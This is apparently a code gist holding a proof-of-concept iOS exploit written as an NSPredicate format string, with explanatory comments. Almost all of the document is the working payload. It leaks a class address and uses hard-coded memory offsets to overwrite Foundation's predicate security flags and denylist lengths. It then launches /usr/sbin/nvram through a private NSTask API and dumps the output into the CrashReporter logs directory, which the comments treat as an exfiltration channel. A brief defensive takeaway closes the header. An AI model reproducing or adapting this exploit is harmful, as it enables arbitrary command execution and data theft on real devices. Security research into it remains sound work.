Last active
December 30, 2023 06:26
Proof-of-concept NSPredicate payload for iOS that disables Foundation's predicate security checks (the forbidden-class/forbidden-selector denylist) and launches an NSTask. The memory offsets in the payload are hard-coded for one specific Foundation build and must be recomputed for any other iOS version.
// Proof-of-concept NSPredicate format-string payload (iOS).
//
// The whole payload is ONE predicate format string assembled from adjacent C
// string literals; Foundation parses and evaluates it, so the string is the
// program. Outer shape: `1=cast({ <comma-separated sub-expressions> }, 'NSDate')`.
// Per the author's comment, the cast exists only so the final result fails
// loudly and the error shows up in syslog for debugging.
//
// What it does, in order:
//   1. Leaks the address of the private _NSPredicateUtilities class as an
//      integer ($_NSPredicateUtilities) by formatting it with '%p/%lld' and
//      taking the last path component as a long long. The author flags this
//      as a hack; exactly which vararg slot %lld ends up reading is not shown
//      here. (The specifiers are single-quoted, which should keep
//      predicateWithFormat: itself from treating them as substitutions.)
//   2. Derives every other address from that base with HARD-CODED OFFSETS
//      (0x188c, 0x276daec, 0x63a334, 0x63a3d4, 0x637860, 0x41a0). These are
//      valid for exactly one Foundation build. On any other iOS version the
//      derived pointers land in unrelated memory and the writes in step 3
//      corrupt it or crash the process — recompute them per target build.
//   3. Uses `function(<NSNumber>, 'getValue:', <pointer>)` as a
//      write-what-where primitive: -[NSNumber getValue:] copies the number's
//      bytes to the address obtained via -nonretainedObjectValue. It sets
//      _predicateSecurityOnce = -1, _predicateSecurityFlags = 0, and zeroes the
//      length fields of the forbidden-class and forbidden-selector arrays, so
//      Foundation's predicate denylist is no longer enforced in this process.
//      (How many bytes each write covers depends on the NSNumber's encoded
//      type — not visible here; it is assumed to match the field widths.)
//   4. Builds an NSTask configuration dictionary from an inline XML plist,
//      attaches an NSPipe as _NSTaskOutputFileHandle, launches
//      /usr/sbin/nvram -p through the private +launchedTaskWithDictionary:,
//      waits for exit, and writes the captured stdout to a file under
//      /private/var/mobile/Library/Logs/CrashReporter/. NOTE(review): that
//      directory is presumably chosen because it is writable from the
//      exploited context and its contents can be retrieved out-of-band
//      (crash-log collection) — confirm; treat the path as the exfil channel.
//
// Defensive takeaway: code that evaluates untrusted predicate/expression
// format strings in-process cannot rely on the forbidden-class/selector
// denylist alone, since the denylist state itself is writable from the
// predicate language once a class pointer has leaked.
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast so the final result fails with a readable error in syslog (debugging aid)
// Leak the address of _NSPredicateUtilities (what #self() resolves to, per the author) through a format string; the author notes there is probably a cleaner way
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags (build-specific offset)
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce (build-specific offset)
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of the length field of the forbidden-classes array (build-specific offset)
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of the length field of the forbidden-selectors array (build-specific offset)
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of the NSTask class object (build-specific offset)
"$NSPipe := $NSTask - 0x41a0," // address of the NSPipe class object (build-specific offset)
"function(1, 'self'," // wrapper: the four writes below are evaluated as its arguments and it returns 1, so their undefined results do not crash the evaluator
"function(-1, 'getValue:', $_predicateSecurityOnce.nonretainedObjectValue)," // write-what-where: _predicateSecurityOnce = -1 ("no checks", per the author)
"function( 0, 'getValue:', $_predicateSecurityFlags.nonretainedObjectValue)," // _predicateSecurityFlags = 0 ("no exceptions", per the author)
"function( 0, 'getValue:', $forbiddenClassesLength.nonretainedObjectValue)," // forbidden-class array length = 0
"function( 0, 'getValue:', $forbiddenSelectorsLength.nonretainedObjectValue))," // forbidden-selector array length = 0
"$dict := '<dict><key>_NSTaskExecutablePath</key><string>/usr/sbin/nvram</string>" // NSTask configuration as an inline XML plist: executable /usr/sbin/nvram ...
"<key>_NSTaskArgumentArray</key><array><string>-p</string></array></dict>'.propertyList," // ... with argument -p; .propertyList parses it into a dictionary (must come back mutable for the setObject:forKey: below to succeed)
// Attach a fresh pipe (+[NSPipe pipe], reached via the leaked class pointer) as the task's output handle so stdout can be read back
"function($dict, 'setObject:forKey:', $NSPipe.nonretainedObjectValue.pipe, '_NSTaskOutputFileHandle'),"
"$task := function($NSTask.nonretainedObjectValue, 'launchedTaskWithDictionary:', $dict)," // launch the task via the private +launchedTaskWithDictionary:
"function(1, 'self', $task.waitUntilExit, " // wrapper again: block until the task exits, then evaluate the write below; returns 1
"function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // read whatever the task wrote to the pipe ...
"'/private/var/mobile/Library/Logs/CrashReporter/nvramahh.ips', nil))}, 'NSDate')"]; // ... and dump it to a file in the CrashReporter logs directory (atomically: nil, i.e. NO); the trailing cast to NSDate fails and logs the result